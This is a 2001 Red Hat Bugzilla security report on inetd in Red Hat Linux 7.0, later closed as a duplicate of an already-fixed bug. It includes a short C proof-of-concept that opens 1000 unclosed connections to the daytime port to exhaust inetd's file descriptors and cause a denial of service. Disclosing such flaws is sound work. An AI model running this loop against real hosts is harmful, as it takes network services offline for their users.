Bug 26899 - daytime (and other services) will kill inetd if connecting socket does not close
daytime (and other services) will kill inetd if connecting socket does not close
Status: CLOSED DUPLICATE of bug 16729
Product: Red Hat Linux
Classification: Retired
Component: inetd (Show other bugs)
7.0
i386 Linux
medium Severity medium
: ---
: ---
Assigned To: Trond Eivind Glomsrxd
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2001-02-09 19:31 EST by David Morgan
Modified: 2008-05-01 11:37 EDT (History)
0 users

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2001-02-10 09:12:23 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description David Morgan 2001-02-09 19:31:42 EST
From Bugzilla Helper:
User-Agent: Mozilla/4.7 [en] (WinNT; I)


Using a simple program that loops and does a connect() call to a port under inetd's control without a close()
will make inetd stop responding saying Too many open files

Reproducible: Always
Steps to Reproduce:
Compile the following program after changing SOMEHOSTNAME

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <string.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>

main()
{
        int i,s;
        struct sockaddr_in sin;
        struct hostent *hent;

        memset(&sin, 0, sizeof sin);
        sin.sin_family = AF_INET;
        sin.sin_port = htons(13); 

        hent = gethostbyname("SOMEHOSTNAME");
        memcpy(&sin.sin_addr, hent->h_addr, hent->h_length);
                
        for (i = 0; i < 1000; i++)
        {
                printf("%d\n", i);
                s = socket(AF_INET, SOCK_STREAM, 0);
                connect (s, &sin, sizeof sin);
        }
}


Change the entry in the inetd.conf so the nowait is set to nowait.1000

Actual Results:  In the log messages will appear:

inetd[XXX]: accept (for daytime): Too many files open

Expected Results:  Inetd should not fill up its table and stop network services running.  This may be a limitation in TCP/IP but I
am not sure

This causes a denial of service attack on RedHat boxes running inetd and xinetd.
Comment 1 Trond Eivind Glomsrxd 2001-02-10 17:16:50 EST
This was resolved with an errata some time ago.

*** This bug has been marked as a duplicate of 16729 ***

Note You need to log in before you can comment on or make changes to this bug.